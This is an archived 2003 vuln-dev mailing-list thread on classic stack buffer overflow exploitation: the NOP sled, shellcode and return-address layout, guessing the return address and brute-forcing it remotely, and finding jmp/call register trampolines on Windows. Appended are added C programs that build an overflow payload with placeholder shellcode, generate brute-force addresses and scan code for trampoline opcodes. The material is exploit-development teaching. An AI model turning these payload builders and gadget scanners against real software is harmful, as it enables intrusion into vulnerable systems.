Re: Some help With BOF Exploits Writing.

From: npguy (npguy_at_linuxmail.org)
Date: 07/29/03

    To: vuln-dev@securityfocus.com
    Date: Tue, 29 Jul 2003 16:09:31 +0800
    
    

    Which one would you consider the better approach:

    placing the shellcode before or after the return addr?
     

    ----- Original Message -----
    From: DownBload <downbload@hotmail.com>
    Date: 26 Jul 2003 12:39:18 -0000
    To: vuln-dev@securityfocus.com
    Subject: Re: Some help With BOF Exploits Writing.

    > In-Reply-To: <Law9-F5967EKRuYDlrj00009721@hotmail.com>
    >
    > Remote bof exploitation is a little bit harder, because you can't just
    > do "movl %esp, %eax" for finding the return address. In classic buffer
    > overflows, for remote exploits, try to install the vuln. application on your
    > host and find the return address. Then you can code an exploit which will
    > probably work on the same architecture, OS and application version as yours.
    > For remote (local also) exploits, you can use the return address brute force
    > method.
    > Remote format string exploits are much more hacker-friendly than classic
    > buffer overflows in return address finding. You can just pop the stack with
    > %x%x%x%x%x.
    >
    > DownBload / Illegal Instruction Labs <www.kamikaza.org>
    >
    >
    > >
    > >The return address should be before your shellcode, inside the NOPs.
    > >
    > >[NNNNNNNNNSSSSSSSSSSSSSRET] buffer stored on stack.
    > >5 1 2 3 4
    > >0xFFFFA 0xFFFFD 0xFFFFE grows upwards.
    > >
    > >1. Bunch of NOP instructions: 0x90, that do nothing, so execution goes to
    > >the right until your code is executed.
    > >
    > >2. Shellcode.
    > >
    > >3. Return address, which is calculated to point somewhere within the NOP
    > >operations; this is calculated locally, by using the stack pointer esp. See 4.
    > >
    > >4. Esp, the stack pointer, points to the top of the stack, which is usually
    > >here, unless there is other data on the stack. To calculate the address of
    > >the NOPs, you'd get the esp address and subtract an offset from it depending
    > >on the size of the data within the stack.
    > >
    > >5. Ebp, the current location inside the stack, so if anything gets pushed,
    > >it'll get pushed here and ebp will continue to shift to the left as more
    > >things are added to the stack.
    > >
    > >most unix code does this like this:
    > >-----------------------------
    > >#include <stdlib.h>   /* atoi */
    > >
    > >unsigned long get_esp(void)
    > >{
    > >    __asm__("movl %esp, %eax");   /* puts the esp (current stack top) into eax;
    > >                                     eax is the return value of most function
    > >                                     calls in C */
    > >}
    > >
    > >/* calculate ret, using offset supplied by user */
    > >
    > >offset = atoi(argv[1]);   /* will crash if there was no input, however;
    > >                             should check first */
    > >RET = get_esp() - offset;
    > >
    > >----------------------------------
    > >
    > >[NNNNNNNNNNNNNSSSSSSSSSSSSSSSRET]
    > >10 20 30 40 50 60
    > >
    > >simple decimal example.
    > >
    > >./exploit 20
    > >
    > >RET = get_esp() - offset
    > >RET = 60 - 20
    > >RET = 40
    > >
    > >crash .. middle of shellcode
    > >
    > >./exploit 40
    > >
    > >RET = get_esp() - offset
    > >RET = 60 - 40
    > >RET = 20
    > >
    > >Bingo, right in the NOPs, execution moves to the right until shellcode
    > >hits.. That's the basic way of doing it anyway.
    > >
    > >Another method is by putting the shellcode, and a lot more NOPs, inside an
    > >environment variable, to increase the size of the padding (NOPs), to
    > >increase the chances of success and have less guesswork.
    > >
    > >Anyone want to add to this?
    > >
    > >And a question of my own, how do remote exploits accomplish this? That's
    > >been on my mind for quite some time.
    > >
    > >deepcode
    > >
    > >>From: "theetabond" <theetabond@rediffmail.com>
    > >>Reply-To: "theetabond" <theetabond@rediffmail.com>
    > >>To: pondermate@hotmail.com
    > >>Subject: Some help With BOF Exploits Writing.
    > >>Date: 25 Jul 2003 06:56:15 -0000
    > >>
    > >>Hi there DeepCode,
    > >> I've been reading your recent posts on Vuln-Dev, and they
    > >>were very informative and useful for me. I had some questions in my mind
    > >>regarding writing buffer overflows on the Win32 platform, and I hope maybe
    > >>you could help me with that.
    > >>I had written some exploits (stack overflow) for Win98 successfully. But
    > >>now I want to do the same thing on Win2k/WinXP platforms. My problem in
    > >>this is in calculating the return address which you write over the previous
    > >>RET instruction. On Win98 I had a util called getcode.exe, which will scan
    > >>the memory and list out the jmp eax, ret eax, call eax, call ebx and
    > >>similar useful addresses which you can use to write at return addresses.
    > >>Unfortunately this particular tool doesn't work on Win2k/XP. So how can I
    > >>calculate the return address on the 2k/XP platform? Disassembling the
    > >>DLLs/EXEs and searching them all for such instances is kinda hard to do.
    > >> So is there any way/tool which can give me the desired output?
    > >>Thank You Very Much
    > >>theeta.
    > >>
    > >>
    > >

    
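As an added example (this is not code from the thread; it is written here to illustrate what deepcode and DownBload describe), the C below builds the [NOPs][shellcode][RET] layout, classifies where a guessed return address lands (in the sled, in the middle of the shellcode, on the RET bytes, or outside the buffer), and generates the guesses a return-address brute force would try against a remote target whose stack cannot be read. The decimal base 10, the 0xbffff0a0 sled address, the 0xbffff000-0xbffff400 range and the int3 bytes standing in for shellcode are all assumptions for illustration. Addresses are plain integers; nothing is executed or written to a real stack. Note that the esp-minus-offset method assumes a 2003-era target: stack ASLR, non-executable stacks and canaries all defeat it on current systems.

```c
/* Added example (not code from this thread): the [NOPs][shellcode][RET] layout
 * deepcode describes, a check of where a guessed return address lands, and the
 * candidate list a return-address brute force (DownBload's remote method) walks.
 * Addresses are plain integers; nothing is executed or written to a real stack. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

enum landing { LAND_OUTSIDE = 0, LAND_NOP, LAND_SHELLCODE, LAND_RET };

/* Payload starts at `base` and is nop_len NOP bytes, then sc_len shellcode
 * bytes, then ret_len bytes of repeated return address. Where does `ret` land? */
enum landing classify_ret(uint32_t base, size_t nop_len, size_t sc_len,
                          size_t ret_len, uint32_t ret)
{
    uint32_t nop_end = base + (uint32_t)nop_len;
    uint32_t sc_end  = nop_end + (uint32_t)sc_len;
    uint32_t ret_end = sc_end + (uint32_t)ret_len;

    if (ret < base || ret >= ret_end) return LAND_OUTSIDE;   /* faults somewhere else */
    if (ret < nop_end)                return LAND_NOP;       /* slides into shellcode */
    if (ret < sc_end)                 return LAND_SHELLCODE; /* "crash .. middle of shellcode" */
    return LAND_RET;                                         /* executes the address bytes */
}

/* Fill out[0..cap) with the classic layout: NOP sled, shellcode, then the
 * 32-bit little-endian return address repeated to the end of the buffer so the
 * saved EIP slot is hit wherever it sits past the shellcode.
 * Returns bytes written, or 0 if the layout does not fit in cap. */
size_t build_payload(uint8_t *out, size_t cap, size_t nop_len,
                     const uint8_t *sc, size_t sc_len, uint32_t ret)
{
    if (nop_len + sc_len + 4 > cap) return 0;
    memset(out, 0x90, nop_len);               /* 0x90 = x86 NOP */
    memcpy(out + nop_len, sc, sc_len);
    size_t pos = nop_len + sc_len;
    while (pos + 4 <= cap) {                  /* x86 is little-endian */
        out[pos++] = (uint8_t)(ret);
        out[pos++] = (uint8_t)(ret >> 8);
        out[pos++] = (uint8_t)(ret >> 16);
        out[pos++] = (uint8_t)(ret >> 24);
    }
    return pos;
}

/* Return addresses to try blindly against a target whose stack we cannot read.
 * With a sled of nop_len bytes, guesses nop_len apart leave no gap: exactly one
 * of them falls inside the sled wherever it starts in [lo, hi). Returns the
 * number of candidates written to out (at most max). */
size_t brute_force_candidates(uint32_t lo, uint32_t hi, size_t nop_len,
                              uint32_t *out, size_t max)
{
    size_t n = 0;
    if (nop_len == 0) return 0;
    for (uint32_t a = lo; a < hi && n < max; ) {
        out[n++] = a;
        if (hi - a <= nop_len) break;         /* do not wrap past UINT32_MAX */
        a += (uint32_t)nop_len;
    }
    return n;
}

int main(void)
{
    /* deepcode's decimal example: sled at 10..29, shellcode at 30..57, RET after. */
    printf("ret 40 lands in %s\n",
           classify_ret(10, 20, 28, 4, 40) == LAND_SHELLCODE ? "shellcode" : "?");
    printf("ret 20 lands in %s\n",
           classify_ret(10, 20, 28, 4, 20) == LAND_NOP ? "NOPs" : "?");

    /* Hypothetical 0xbffff0a0 sled address; four int3 bytes stand in for shellcode. */
    static const uint8_t sc[] = { 0xcc, 0xcc, 0xcc, 0xcc };
    uint8_t buf[64];
    size_t n = build_payload(buf, sizeof buf, 40, sc, sizeof sc, 0xbffff0a0u);
    printf("payload: %zu bytes, last RET copy at offset %zu\n", n, n - 4);

    uint32_t cand[16];
    size_t c = brute_force_candidates(0xbffff000u, 0xbffff400u, 256, cand, 16);
    printf("%zu guesses cover 1 KiB of stack with a 256-byte sled\n", c);
    return 0;
}
```

The sled size is the knob that trades payload length for fewer guesses: a 256-byte sled covers 1 KiB of stack in four tries, which is why the environment-variable trick deepcode mentions (a much larger sled) reduces the guesswork. In practice a brute forcer steps a little less than the sled length so a guess never lands on the sled's last few bytes.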

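theetabond's question, scanning for jmp esp / call eax / call ebx style instructions to use as the return address, is what a getcode.exe-style tool does, and the core of such a scanner is small. The C below is an added example (not code from this thread and not getcode.exe) that searches a byte block for those register-trampoline opcodes and then applies the filter a practitioner wants: an address containing 0x00, 0x0a or 0x0d cannot survive a strcpy- or gets-style copy. SAMPLE_CODE is a constructed byte string standing in for a module's code section and 0x77e01000 is a hypothetical load address; on a real target you would feed it the code section of a DLL that is loaded at a fixed address (which is also why this only helps where modules are not randomised).

```c
/* Added example (not code from this thread, nor from getcode.exe): scan a
 * block of x86 code for the register-trampoline instructions theetabond's
 * tool listed, and filter the hits for bytes an overflow cannot carry. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

struct tramp { const char *name; uint8_t op[2]; };

/* FF /4 = jmp r/m32, FF /2 = call r/m32; modrm 11 reg reg picks the register. */
static const struct tramp TRAMPS[] = {
    { "jmp esp",       { 0xff, 0xe4 } },
    { "call esp",      { 0xff, 0xd4 } },
    { "jmp eax",       { 0xff, 0xe0 } },
    { "call eax",      { 0xff, 0xd0 } },
    { "jmp ebx",       { 0xff, 0xe3 } },
    { "call ebx",      { 0xff, 0xd3 } },
    { "push esp; ret", { 0x54, 0xc3 } },
};
#define NTRAMPS (sizeof TRAMPS / sizeof TRAMPS[0])

struct hit { uint32_t addr; const char *name; };

/* Scan `code` (len bytes, assumed mapped at `base`) for every 2-byte pattern
 * in TRAMPS. Writes up to max hits to out and returns how many were found. */
size_t find_trampolines(const uint8_t *code, size_t len, uint32_t base,
                        struct hit *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i + 1 < len && n < max; i++) {
        for (size_t t = 0; t < NTRAMPS; t++) {
            if (code[i] == TRAMPS[t].op[0] && code[i + 1] == TRAMPS[t].op[1]) {
                out[n].addr = base + (uint32_t)i;
                out[n].name = TRAMPS[t].name;
                n++;
                break;
            }
        }
    }
    return n;
}

/* 1 if any byte of the little-endian address is in the bad list, else 0.
 * 0x00 ends a strcpy copy and 0x0a/0x0d end a gets/fgets line, so such an
 * address never reaches the saved EIP slot intact. */
int addr_has_bad_byte(uint32_t addr, const uint8_t *bad, size_t nbad)
{
    for (int shift = 0; shift < 32; shift += 8) {
        uint8_t b = (uint8_t)(addr >> shift);
        for (size_t i = 0; i < nbad; i++)
            if (b == bad[i]) return 1;
    }
    return 0;
}

/* Constructed stand-in for a DLL's code section (not real module bytes). */
static const uint8_t SAMPLE_CODE[] = {
    0x55, 0x8b, 0xec,        /* push ebp; mov ebp, esp */
    0x90, 0x90,              /* nop; nop */
    0xff, 0xe4,              /* jmp esp        (offset 5)  */
    0xc3,                    /* ret */
    0x31, 0xc0,              /* xor eax, eax */
    0xff, 0xd0,              /* call eax       (offset 10) */
    0x54, 0xc3,              /* push esp; ret  (offset 12) */
    0x00,                    /* filler */
    0xff, 0xe0,              /* jmp eax        (offset 15) */
};

int main(void)
{
    const uint32_t base = 0x77e01000u;            /* hypothetical load address */
    const uint8_t bad[] = { 0x00, 0x0a, 0x0d };   /* typical strcpy/gets killers */
    struct hit hits[16];
    size_t n = find_trampolines(SAMPLE_CODE, sizeof SAMPLE_CODE, base, hits, 16);

    for (size_t i = 0; i < n; i++)
        printf("0x%08x  %-14s %s\n", hits[i].addr, hits[i].name,
               addr_has_bad_byte(hits[i].addr, bad, sizeof bad)
                   ? "(contains bad byte)" : "usable");
    return 0;
}
```

With the hypothetical base the "call eax" hit lands at 0x77e0100a, which contains a newline byte and would be cut off by any line-oriented read, while the "jmp esp" hit at 0x77e01005 is clean; the same scanner run over the real bytes of a loaded module is how the addresses getcode.exe printed are obtained, and a pointer to the ret address region on the stack is the usual reason jmp esp is the preferred one.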